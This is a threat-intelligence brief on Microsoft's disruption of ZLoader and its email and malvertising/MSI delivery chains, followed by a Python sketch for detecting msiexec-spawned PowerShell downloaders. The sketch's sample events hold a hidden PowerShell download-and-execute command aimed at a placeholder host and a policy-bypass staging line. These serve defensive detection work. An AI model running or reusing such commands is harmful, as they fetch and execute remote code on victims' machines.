2022-04-19

Microsoft Analyzes & Disrupts Zloader

Level: Tactical | Source: Microsoft Cybersecurity


Microsoft's coordination with telecommunications providers has enabled the takedown of various pieces of ZLoader infrastructure. Microsoft has also published intelligence on the attack chains associated with ZLoader, each using a different technique to deliver the ZLoader payload. The first attack chain relies on email carrying a malicious link or attachment that downloads the ZLoader payload. A second attack chain leverages Google Ads, popular advertising software tools and compromised legitimate domains to stage malicious content on subdomains; a malicious MSI downloaded and executed by the victim triggers PowerShell and scripts that download the ZLoader payload. Once the ZLoader payload has been dropped by either chain, the modular malware typically establishes persistence, downloads additional payloads, or begins enumeration to fulfill the attacker's objectives.
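The MSI-to-PowerShell hand-off in the second chain is the step most visible in endpoint process-creation telemetry. The following is an added detection sketch, not Microsoft's or Anvilogic's own content: it scores Sysmon-style process-creation events (field names and the sample events are constructed) where msiexec.exe spawns a script host with download or evasion markers on the command line.

```python
"""Flag the MSI -> PowerShell -> download step described above in
process-creation logs. Added illustration; field names are assumed to
mirror Sysmon Event ID 1 and every event below is constructed."""
import re
from typing import Iterable

# Constructed sample events: two installer-spawned PowerShell downloaders,
# one benign admin script and one installer-spawned cmd.exe.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent_image": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://example.invalid/a.ps1')"},
    {"host": "ws02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"host": "ws03", "parent_image": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c echo installed"},
    {"host": "ws04", "parent_image": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -ExecutionPolicy Bypass -File C:\\ProgramData\\stage.ps1"},
]

SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")
# Command-line markers of download or evasion behaviour in installer-spawned scripts.
SUSPICIOUS_ARGS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|"
    r"\biex\b|invoke-expression|-enc\b|-encodedcommand|-w\s+hidden|bypass)",
    re.IGNORECASE,
)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event: dict) -> int:
    """Score one process-creation event; 0 means no interest."""
    score = 0
    if basename(event["parent_image"]) == "msiexec.exe" and basename(event["image"]) in SCRIPT_HOSTS:
        score += 1  # installer handing execution to a script interpreter
        hits = {m.lower() for m in SUSPICIOUS_ARGS.findall(event["command_line"])}
        score += len(hits)  # each distinct download/evasion marker raises the score
    return score

def detect(events: Iterable[dict], threshold: int = 2) -> list[str]:
    """Hosts whose events reach the threshold; tune the threshold per environment."""
    return [e["host"] for e in events if score_event(e) >= threshold]
```

The threshold of 2 requires at least one marker beyond the bare msiexec-to-script-host relationship, so a plain installer custom action that runs a local script without download or hiding flags scores 1 and is left for baselining rather than alerting.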

